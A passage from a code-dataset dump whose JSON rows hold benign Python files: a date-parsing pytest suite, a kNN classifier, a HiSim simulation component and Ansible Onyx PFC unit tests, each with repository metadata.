'dynamic_lr':\n return _dynamic_lr(initial_lr, total_epochs * steps_pre_epoch, warmup_epoch * steps_pre_epoch,\n warmup_ratio=1 / 3)\n\n lr_each_step = []\n for epoch in range(1, total_epochs + 1):\n for _ in range(steps_pre_epoch):\n if epoch <= warmup_epoch:\n lr = 0.1 * initial_lr * (1.5849 ** (epoch - 1))\n else:\n if stepvalues[0] <= epoch <= stepvalues[1]:\n lr = initial_lr * (gamma ** (1))\n elif epoch > stepvalues[1]:\n lr = initial_lr * (gamma ** (2))\n else:\n lr = initial_lr\n lr_each_step.append(lr)\n return lr_each_step\n"},"avg_line_length":{"kind":"number","value":39.2903225806,"string":"39.290323"},"max_line_length":{"kind":"number","value":103,"string":"103"},"alphanum_fraction":{"kind":"number","value":0.644909688,"string":"0.64491"}}},{"rowIdx":46355,"cells":{"hexsha":{"kind":"string","value":"fc36197e9b5f7a39f94875fa5f46ff8640aed7c6"},"size":{"kind":"number","value":5903,"string":"5,903"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py"},"max_stars_repo_name":{"kind":"string","value":"diCagri/content"},"max_stars_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":799,"string":"799"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2016-08-02T06:43:14.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-31T11:10:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py"},"max_issues_repo_name":{"kind":"string","value":"diCagri/content"},"max_issues_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":9317,"string":"9,317"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2016-08-07T19:00:51.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-31T21:56:04.000Z"},"max_forks_repo_path":{"kind":"string","value":"Packs/CommonScripts/Scripts/DateStringToISOFormat/DateStringToISOFormat_test.py"},"max_forks_repo_name":{"kind":"string","value":"diCagri/content"},"max_forks_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1297,"string":"1,297"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2016-08-04T13:59:00.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-31T23:43:06.000Z"},"content":{"kind":"string","value":"from DateStringToISOFormat import parse_datestring_to_iso\nimport demistomock as demisto\nimport pytest\n\n\n# date_value, day_first, year_first, fuzzy, expected_output\ntestdata = [\n ('05-11-2929', True, True, True, True, '2929-11-05T00:00:00+00:00'),\n ('05-11-2929', True, False, True, True, '2929-11-05T00:00:00+00:00'),\n ('05-11-2929', True, True, False, True, '2929-11-05T00:00:00+00:00'),\n ('05-11-2929', True, False, False, False, '2929-11-05T00:00:00'),\n ('05-11-2929', False, True, True, False, '2929-05-11T00:00:00'),\n ('05-11-2929', False, False, True, False, '2929-05-11T00:00:00'),\n ('05-11-2929', False, False, False, False, '2929-05-11T00:00:00'),\n ('2020-06-11T17:34:35.754203+03:00', True, True, True, True, '2020-11-06T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', True, False, True, True, '2020-11-06T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', True, True, False, True, '2020-11-06T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', True, False, False, True, '2020-11-06T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', False, True, True, False, '2020-06-11T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', False, False, True, False, '2020-06-11T17:34:35.754203+03:00'),\n ('2020-06-11T17:34:35.754203+03:00', False, False, False, False, '2020-06-11T17:34:35.754203+03:00'),\n (\"June 21st 2020 Eastern Standard Time\", True, True, True, True, \"2020-06-21T00:00:00+00:00\"),\n (\"June 21st 2020 Eastern Standard Time\", True, False, True, True, \"2020-06-21T00:00:00+00:00\"),\n (\"June 21st 2020 Eastern Standard Time\", True, True, False, True, \"June 21st 2020 Eastern Standard Time\"),\n (\"June 21st 2020 Eastern Standard Time\", True, False, False, True, \"June 21st 2020 Eastern Standard Time\"),\n (\"June 21st 2020 Eastern Standard Time\", False, True, True, False, \"2020-06-21T00:00:00\"),\n (\"June 21st 2020 Eastern Standard Time\", False, False, True, False, \"2020-06-21T00:00:00\"),\n (\"June 21st 2020 Eastern Standard Time\", False, False, False, False, \"June 21st 2020 Eastern Standard Time\"),\n (\"The 1st of June 2020\", True, True, True, True, \"2020-06-01T00:00:00+00:00\"),\n (\"The 1st of June 2020\", True, False, True, True, \"2020-06-01T00:00:00+00:00\"),\n (\"The 1st of June 2020\", True, True, False, True, \"The 1st of June 2020\"),\n (\"The 1st of June 2020\", True, False, False, True, \"The 1st of June 2020\"),\n (\"The 1st of June 2020\", False, True, True, False, \"2020-06-01T00:00:00\"),\n (\"The 1st of June 2020\", False, False, True, False, \"2020-06-01T00:00:00\"),\n (\"The 1st of June 2020\", False, False, False, False, \"The 1st of June 2020\"),\n ('2020-06-11T17:34:35.754Z', False, False, False, True, '2020-06-11T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', True, True, True, True, '2020-11-06T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', True, False, True, True, '2020-11-06T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', True, True, False, True, '2020-11-06T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', True, False, False, True, '2020-11-06T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', False, True, True, False, '2020-06-11T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', False, False, True, False, '2020-06-11T17:34:35.754000+00:00'),\n ('2020-06-11T17:34:35.754Z', False, False, False, False, '2020-06-11T17:34:35.754000+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', False, False, False, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', True, True, True, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', True, False, True, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', True, True, False, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', True, False, False, True, '2020-11-20T11:41:42+00:00'),\n ('Fri, 20 Nov 2020 11:41:42', False, True, True, False, '2020-11-20T11:41:42'),\n ('Fri, 20 Nov 2020 11:41:42', False, False, True, False, '2020-11-20T11:41:42'),\n ('Fri, 20 Nov 2020 11:41:42', False, False, False, False, '2020-11-20T11:41:42'),\n ('Fri, 20 Nov 2020 11:41:42', False, False, False, False, '2020-11-20T11:41:42'),\n]\n\n\n@pytest.mark.parametrize('date_value,day_first,year_first,fuzzy,add_utc_timezone,expected_output', testdata)\ndef test_parse_datestring_to_iso(mocker, date_value, day_first, year_first, fuzzy, add_utc_timezone, expected_output):\n '''Scenario: Parse an arbitrary date string and convert it to ISO 8601 format\n\n Given\n - An arbitrary date string\n When\n - The date string can be an ambiguous 3-integer date, fuzzy date string or an\n already iso-8601 formatted date string\n Then\n - Ensure the output date string is in iso-8601 format in all cases\n\n Args:\n date_value (str): A string containing a date stamp.\n day_first (bool): Whether to interpret the first value in an ambiguous 3-integer date\n (e.g. 01/05/09) as the day or month.\n year_first (bool): Whether to interpret the first value in an ambiguous 3-integer date\n (e.g. 01/05/09) as the year. If ``True``, the first number is taken to\n be the year, otherwise the last number is taken to be the year.\n fuzzy (bool): Whether to allow fuzzy parsing, allowing for string like \"Today is\n January 1, 2047 at 8:21:00AM\".\n add_utc_timezone (bool): Whether to add UTC timezone to the date string returned in case offset-naive\n date was provided as input.\n expected_output (str): The iso 8601 formatted date to check the result against\n '''\n mocker.patch.object(demisto, 'error')\n assert parse_datestring_to_iso(date_value, day_first, year_first, fuzzy, add_utc_timezone) == expected_output\n"},"avg_line_length":{"kind":"number","value":71.1204819277,"string":"71.120482"},"max_line_length":{"kind":"number","value":118,"string":"118"},"alphanum_fraction":{"kind":"number","value":0.6554294427,"string":"0.655429"}}},{"rowIdx":46356,"cells":{"hexsha":{"kind":"string","value":"5dca870e069c6a0a5d577bc3920a45fd2a1a7e19"},"size":{"kind":"number","value":5289,"string":"5,289"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"KNN/kNN.py"},"max_stars_repo_name":{"kind":"string","value":"lance52587/MachineLearningNote"},"max_stars_repo_head_hexsha":{"kind":"string","value":"0184f8de178990ee31ace2a43809830874313697"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":37,"string":"37"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-06-06T05:58:54.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-02-21T04:49:54.000Z"},"max_issues_repo_path":{"kind":"string","value":"KNN/kNN.py"},"max_issues_repo_name":{"kind":"string","value":"YYangjlu/MachineLearningNote"},"max_issues_repo_head_hexsha":{"kind":"string","value":"d34a9b57af3b2c6f276d14c2a7a3dccadb585421"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"KNN/kNN.py"},"max_forks_repo_name":{"kind":"string","value":"YYangjlu/MachineLearningNote"},"max_forks_repo_head_hexsha":{"kind":"string","value":"d34a9b57af3b2c6f276d14c2a7a3dccadb585421"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":35,"string":"35"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2018-10-01T16:12:34.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-02-21T03:35:33.000Z"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# @Date : 2017-04-03 15:47:04\n# @Author : Alan Lau (rlalan@outlook.com)\n# import numpy as np\n# import distance\n# import fwalker\n# import reader\n# import statistic\n\n# def get_data(data_path):\n# label_vec = []\n# files = fwalker.fun(data_path)\n# for file in files:\n# ech_label_vec = []\n# ech_label = int((file.split('\\\\'))[-1][0])\n# ech_vec = ((np.loadtxt(file)).ravel())\n# ech_label_vec.append(ech_label)\n# ech_label_vec.append(ech_vec)\n# label_vec.append(ech_label_vec)\n# return label_vec\n\n# def find_label(train_vec_list, vec, k):\n# get_label_list = []\n# for ech_trainlabel_vec in train_vec_list:\n# ech_label_distance = []\n# train_label, train_vec = ech_trainlabel_vec[0], ech_trainlabel_vec[1]\n# vec_distance = distance.Euclidean(train_vec, vec)\n# ech_label_distance.append(train_label)\n# ech_label_distance.append(vec_distance)\n# get_label_list.append(ech_label_distance)\n# result_k = np.array(get_label_list)\n# order_distance = (result_k.T)[1].argsort()\n# order = np.array((result_k[order_distance].T)[0])\n# top_k = np.array(order[:k], dtype=int)\n# find_label = statistic.orderdic(statistic.statistic(top_k), True)[0][0]\n# return find_label\n\n# def classify(train_vec_list, test_vec_list, k):\n# error_counter = 0\n# for ech_label_vec in test_vec_list:\n# label, vec = ech_label_vec[0], ech_label_vec[1]\n# get_label = find_label(train_vec_list, vec, k)\n# print('Original label is:'+str(label) +\n# ', kNN label is:'+str(get_label))\n# if str(label) != str(get_label):\n# error_counter += 1\n# else:\n# continue\n# true_probability = str(\n# round((1-error_counter/len(test_vec_list))*100, 2))+'%'\n# print('Correct probability:'+true_probability)\n\n# def main():\n# k = 3\n# train_data_path = r'D:\\DevelopmentLanguage\\Python\\MachineLearning\\Learning\\KNN\\lab3_0930\\input_digits\\trainingDigits'\n# test_data_path = r'D:\\DevelopmentLanguage\\Python\\MachineLearning\\Learning\\KNN\\lab3_0930\\input_digits\\testDigits'\n# train_vec_list = get_data(train_data_path)\n# test_vec_list = get_data(test_data_path)\n# classify(train_vec_list, test_vec_list, k)\n\n# if __name__ == '__main__':\n# main()\n\n# -*- coding: utf-8 -*-\n# @Date : 2017-04-03 15:47:04\n# @Author : Alan Lau (rlalan@outlook.com)\n\nimport os\nimport math\nimport collections\nimport numpy as np\n\n\ndef Euclidean(vec1, vec2):\n npvec1, npvec2 = np.array(vec1), np.array(vec2)\n return math.sqrt(((npvec1 - npvec2)**2).sum())\n\n\ndef fwalker(path):\n fileArray = []\n for root, dirs, files in os.walk(path):\n for fn in files:\n eachpath = str(root + '\\\\' + fn)\n fileArray.append(eachpath)\n return fileArray\n\n\ndef orderdic(dic, reverse):\n ordered_list = sorted(\n dic.items(), key=lambda item: item[1], reverse=reverse)\n return ordered_list\n\n\ndef get_data(data_path):\n label_vec = []\n files = fwalker(data_path)\n for file in files:\n ech_label_vec = []\n ech_label = int((file.split('\\\\'))[-1][0]) # 获取每个向量的标签\n ech_vec = ((np.loadtxt(file)).ravel()) # 获取每个文件的向量\n ech_label_vec.append(ech_label) # 将一个文件夹的标签和向量放到同一个list内\n ech_label_vec.append(\n ech_vec\n ) # 将一个文件夹的标签和向量放到同一个list内,目的是将标签和向量对应起来,类似于字典,这里不直接用字典因为字典的键(key)不可重复。\n label_vec.append(ech_label_vec) # 再将所有的标签和向量存入一个list内,构成二维数组\n return label_vec\n\n\ndef find_label(train_vec_list, vec, k):\n get_label_list = []\n for ech_trainlabel_vec in train_vec_list:\n ech_label_distance = []\n train_label, train_vec = ech_trainlabel_vec[0], ech_trainlabel_vec[1]\n vec_distance = Euclidean(train_vec, vec) # 计算距离\n ech_label_distance.append(train_label)\n ech_label_distance.append(vec_distance) # 将距离和标签对应存入list\n get_label_list.append(ech_label_distance)\n result_k = np.array(get_label_list)\n order_distance = (result_k.T)[1].argsort() # 对距离进行排序\n order = np.array((result_k[order_distance].T)[0])\n top_k = np.array(order[:k], dtype=int) # 获取前k距离和标签\n find_label = orderdic(collections.Counter(top_k),\n True)[0][0] # 统计在前k排名中标签出现频次\n return find_label\n\n\ndef classify(train_vec_list, test_vec_list, k):\n error_counter = 0 #计数器,计算错误率\n for ech_label_vec in test_vec_list:\n label, vec = ech_label_vec[0], ech_label_vec[1]\n get_label = find_label(train_vec_list, vec, k) # 获得学习得到的标签\n print('Original label is:' + str(label) + ', kNN label is:' +\n str(get_label))\n if str(label) != str(get_label):\n error_counter += 1\n else:\n continue\n true_probability = str(\n round((1 - error_counter / len(test_vec_list)) * 100, 2)) + '%'\n print('Correct probability:' + true_probability)\n\n\ndef main():\n k = 3\n train_data_path = r'..\\KNN\\lab3_0930\\input_digits\\trainingDigits'\n test_data_path = r'..\\KNN\\lab3_0930\\input_digits\\testDigits'\n train_vec_list = get_data(train_data_path)\n test_vec_list = get_data(test_data_path)\n classify(train_vec_list, test_vec_list, k)\n\n\nif __name__ == '__main__':\n main()"},"avg_line_length":{"kind":"number","value":34.568627451,"string":"34.568627"},"max_line_length":{"kind":"number","value":123,"string":"123"},"alphanum_fraction":{"kind":"number","value":0.650973719,"string":"0.650974"}}},{"rowIdx":46357,"cells":{"hexsha":{"kind":"string","value":"5d30b9642ca02eb7664d764f1fd524886afbe78d"},"size":{"kind":"number","value":6643,"string":"6,643"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"hisim/components/dummy.py"},"max_stars_repo_name":{"kind":"string","value":"sdickler/HiSim"},"max_stars_repo_head_hexsha":{"kind":"string","value":"09a11d99f220f7cadb3cb7b09a6fce8f147243c8"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"hisim/components/dummy.py"},"max_issues_repo_name":{"kind":"string","value":"sdickler/HiSim"},"max_issues_repo_head_hexsha":{"kind":"string","value":"09a11d99f220f7cadb3cb7b09a6fce8f147243c8"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"hisim/components/dummy.py"},"max_forks_repo_name":{"kind":"string","value":"sdickler/HiSim"},"max_forks_repo_head_hexsha":{"kind":"string","value":"09a11d99f220f7cadb3cb7b09a6fce8f147243c8"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1,"string":"1"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2022-03-13T16:15:36.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-13T16:15:36.000Z"},"content":{"kind":"string","value":"# Generic/Built-in\nimport copy\nimport numpy as np\nfrom typing import List, Optional\n# Owned\nfrom hisim.component import Component, SingleTimeStepValues, ComponentInput, ComponentOutput\nfrom hisim.components.ev_charger import SimpleStorageState\nfrom hisim.utils import HISIMPATH\nfrom hisim import loadtypes as lt\nfrom hisim.utils import load_smart_appliance\nfrom hisim import utils\nimport pdb\nfrom hisim.simulationparameters import SimulationParameters\n\n\n__authors__ = \"Vitor Hugo Bellotto Zago\"\n__copyright__ = \"Copyright 2021, the House Infrastructure Project\"\n__credits__ = [\"Noah Pflugradt\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Vitor Hugo Bellotto Zago\"\n__email__ = \"vitor.zago@rwth-aachen.de\"\n__status__ = \"development\"\n\nclass Dummy(Component):\n \"\"\"\n Component component the supports multiple\n dummy values for fictitious scenarios. The\n values passed to the constructor are taken\n as constants to build the load profile for\n the entire simulation duration\n\n Parameters\n ----------\n electricity : float\n Constant to define electricity output profile\n heat : float\n Constant to define heat output profile\n capacity : float\n Stored energy when starting the simulation\n initial_temperature : float\n Initial temperature when starting the simulation\n sim_params: cp.SimulationParameters\n Simulation parameters used by the setup function:\n \"\"\"\n ThermalEnergyDelivered = \"ThermalEnergyDelivered\"\n\n # Outputs\n ElectricityOutput = \"ElectricityOutput\"\n TemperatureMean = \"Residence Temperature\"\n StoredEnergy=\"StoredEnergy\"\n\n def __init__(self,\n my_simulation_parameters: SimulationParameters,\n electricity=None,\n heat=None,\n capacity=None,\n initial_temperature=None,\n ):\n super().__init__(name=\"Dummy\", my_simulation_parameters=my_simulation_parameters)\n self.capacity:float\n self.initial_temperature:float\n self.build(electricity=electricity,\n heat=heat,\n capacity=capacity,\n initial_temperature=initial_temperature)\n\n self.thermal_energy_deliveredC : ComponentInput = self.add_input(self.ComponentName,\n self.ThermalEnergyDelivered,\n lt.LoadTypes.Heating,\n lt.Units.Watt,\n False)\n\n self.t_mC : ComponentOutput = self.add_output(self.ComponentName,\n self.TemperatureMean,\n lt.LoadTypes.Temperature,\n lt.Units.Celsius)\n\n self.electricity_outputC: ComponentOutput = self.add_output(self.ComponentName,\n self.ElectricityOutput,\n lt.LoadTypes.Electricity,\n lt.Units.Watt)\n self.stored_energyC: ComponentOutput = self.add_output(self.ComponentName,\n self.StoredEnergy,\n lt.LoadTypes.Heating,\n lt.Units.Watt)\n self.temperature:float = -300\n\n\n def build(self, electricity:Optional[float], heat:float, capacity:Optional[float], initial_temperature:Optional[float]):\n self.time_correction_factor:float = 1 / self.my_simulation_parameters.seconds_per_timestep\n self.seconds_per_timestep:float = self.my_simulation_parameters.seconds_per_timestep\n\n if electricity is None:\n self.electricity_output:float = - 1E3\n else:\n self.electricity_output = - 1E3 * electricity\n\n\n if capacity is None:\n self.capacity = 45 * 121.2\n else:\n self.capacity = capacity\n\n if initial_temperature is None:\n self.temperature = 25\n self.initial_temperature = 25\n else:\n self.temperature = initial_temperature\n self.initial_temperature = initial_temperature\n self.previous_temperature = self.temperature\n\n\n def write_to_report(self):\n lines:List =[]\n return lines\n\n def i_save_state(self):\n self.previous_temperature = self.temperature\n\n def i_restore_state(self):\n self.temperature = self.previous_temperature\n\n\n def i_doublecheck(self, timestep: int, stsv: SingleTimeStepValues):\n pass\n\n def i_simulate(self, timestep: int, stsv: SingleTimeStepValues, force_convergence: bool):\n electricity_output:float = 0\n if timestep >= 60*6 and timestep < 60*9:\n electricity_output = self.electricity_output\n elif timestep >= 60*15 and timestep < 60*18:\n electricity_output = - self.electricity_output\n\n stsv.set_output_value(self.electricity_outputC, electricity_output)\n\n if timestep <= 60*12:\n thermal_delivered_energy = 0\n temperature:float = self.initial_temperature\n current_stored_energy = ( self.initial_temperature + 273.15) * self.capacity\n else:\n thermal_delivered_energy = stsv.get_input_value(self.thermal_energy_deliveredC)\n previous_stored_energy = (self.previous_temperature + 273.15) * self.capacity\n current_stored_energy = previous_stored_energy + thermal_delivered_energy\n self.temperature = current_stored_energy / self.capacity - 273.15\n temperature = self.temperature\n\n #thermal_delivered_energy = 0\n #temperature = self.initial_temperature\n #current_stored_energy = ( self.initial_temperature + 273.15) * self.capacity\n # else:\n #thermal_delivered_energy = stsv.get_input_value(self.thermal_energy_deliveredC)\n #previous_stored_energy = (self.previous_temperature + 273.15) * self.capacity\n #current_stored_energy = previous_stored_energy + thermal_delivered_energy\n #self.temperature = current_stored_energy / self.capacity - 273.15\n #temperature = self.temperature\n\n stsv.set_output_value(self.stored_energyC, current_stored_energy)\n stsv.set_output_value(self.t_mC, temperature)\n\n\n"},"avg_line_length":{"kind":"number","value":41.0061728395,"string":"41.006173"},"max_line_length":{"kind":"number","value":124,"string":"124"},"alphanum_fraction":{"kind":"number","value":0.6171910281,"string":"0.617191"}}},{"rowIdx":46358,"cells":{"hexsha":{"kind":"string","value":"dbaaf23f145d5a04f8b02a26023396b77b3dc4df"},"size":{"kind":"number","value":4447,"string":"4,447"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py"},"max_stars_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py"},"max_issues_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py"},"max_forks_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#\n# Copyright: Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\n# Make coding more python3-ish\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nfrom ansible_collections.community.general.tests.unit.compat.mock import patch\nfrom ansible_collections.community.general.plugins.modules.network.onyx import onyx_pfc_interface\nfrom ansible_collections.community.general.tests.unit.modules.utils import set_module_args\nfrom ..onyx_module import TestOnyxModule, load_fixture\n\n\nclass TestOnyxPfcInterfaceModule(TestOnyxModule):\n\n module = onyx_pfc_interface\n\n def setUp(self):\n super(TestOnyxPfcInterfaceModule, self).setUp()\n self._pfc_enabled = True\n self.mock_get_config = patch.object(\n onyx_pfc_interface.OnyxPfcInterfaceModule,\n \"_get_pfc_config\")\n self.get_config = self.mock_get_config.start()\n\n self.mock_load_config = patch(\n 'ansible_collections.community.general.plugins.module_utils.network.onyx.onyx.load_config')\n self.load_config = self.mock_load_config.start()\n self.mock_get_version = patch.object(\n onyx_pfc_interface.OnyxPfcInterfaceModule, \"_get_os_version\")\n self.get_version = self.mock_get_version.start()\n\n def tearDown(self):\n super(TestOnyxPfcInterfaceModule, self).tearDown()\n self.mock_get_config.stop()\n self.mock_load_config.stop()\n self.mock_get_version.stop()\n\n def load_fixtures(self, commands=None, transport='cli'):\n if self._pfc_enabled:\n suffix = 'enabled'\n else:\n suffix = 'disabled'\n config_file = 'onyx_pfc_interface_%s.cfg' % suffix\n\n self.get_config.return_value = load_fixture(config_file)\n self.load_config.return_value = None\n self.get_version.return_value = \"3.6.5000\"\n\n def _test_pfc_if(self, if_name, enabled, changed, commands):\n state = 'enabled' if enabled else 'disabled'\n set_module_args(dict(name=if_name, state=state))\n self.execute_module(changed=changed, commands=commands)\n\n def _test_pfc_no_change(self, enabled):\n interfaces = ('Eth1/1', 'Eth1/1/2', 'Po1', 'Mpo2')\n changed = False\n commands = None\n for ifc in interfaces:\n self._test_pfc_if(ifc, enabled, changed, commands)\n\n def test_pfc_enabled_no_change(self):\n self._pfc_enabled = True\n enabled = True\n self._test_pfc_no_change(enabled)\n\n def test_pfc_disabled_no_change(self):\n self._pfc_enabled = False\n enabled = False\n self._test_pfc_no_change(enabled)\n\n def _test_pfc_change(self, enabled):\n cmd_list = [\n ('Eth1/1', 'interface ethernet 1/1'),\n ('Eth1/1/2', 'interface ethernet 1/1/2'),\n ('Po1', 'interface port-channel 1'),\n ('Mpo2', 'interface mlag-port-channel 2'),\n ]\n changed = True\n suffix = ' dcb priority-flow-control mode on force'\n if not enabled:\n suffix = ' no dcb priority-flow-control mode force'\n for (if_name, cmd) in cmd_list:\n commands = [cmd + suffix]\n self._test_pfc_if(if_name, enabled, changed, commands)\n\n def test_pfc_disabled_change(self):\n self._pfc_enabled = False\n enabled = True\n self._test_pfc_change(enabled)\n\n def test_pfc_enabled_change(self):\n self._pfc_enabled = True\n enabled = False\n self._test_pfc_change(enabled)\n\n def test_pfc_aggregate(self):\n self._pfc_enabled = False\n aggregate = [dict(name='Eth1/1'), dict(name='Eth1/1/2')]\n set_module_args(dict(aggregate=aggregate, state='enabled'))\n commands = [\n 'interface ethernet 1/1 dcb priority-flow-control mode on force',\n 'interface ethernet 1/1/2 dcb priority-flow-control mode on force']\n self.execute_module(changed=True, commands=commands)\n\n def test_pfc_aggregate_purge(self):\n self._pfc_enabled = True\n aggregate = [dict(name='Po1'), dict(name='Mpo2')]\n set_module_args(dict(aggregate=aggregate, state='enabled', purge=True))\n commands = [\n 'interface ethernet 1/1 no dcb priority-flow-control mode force',\n 'interface ethernet 1/1/2 no dcb priority-flow-control mode force']\n self.execute_module(changed=True, commands=commands)\n"},"avg_line_length":{"kind":"number","value":38.6695652174,"string":"38.669565"},"max_line_length":{"kind":"number","value":103,"string":"103"},"alphanum_fraction":{"kind":"number","value":0.6705644255,"string":"0.670564"}}},{"rowIdx":46359,"cells":{"hexsha":{"kind":"string","value":"dbc9b69c59fff01ef0e276b0ea84fad1e309986e"},"size":{"kind":"number","value":818,"string":"818"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"sketches/natureOfCode/chapter01/mover/mover.py"},"max_stars_repo_name":{"kind":"string","value":"kantel/processingpy"},"max_stars_repo_head_hexsha":{"kind":"string","value":"74aae222e46f68d1c8f06307aaede3cdae65c8ec"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":4,"string":"4"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-06-03T02:11:46.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-08-18T19:55:15.000Z"},"max_issues_repo_path":{"kind":"string","value":"sketches/natureOfCode/chapter01/mover/mover.py"},"max_issues_repo_name":{"kind":"string","value":"kantel/processingpy"},"max_issues_repo_head_hexsha":{"kind":"string","value":"74aae222e46f68d1c8f06307aaede3cdae65c8ec"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 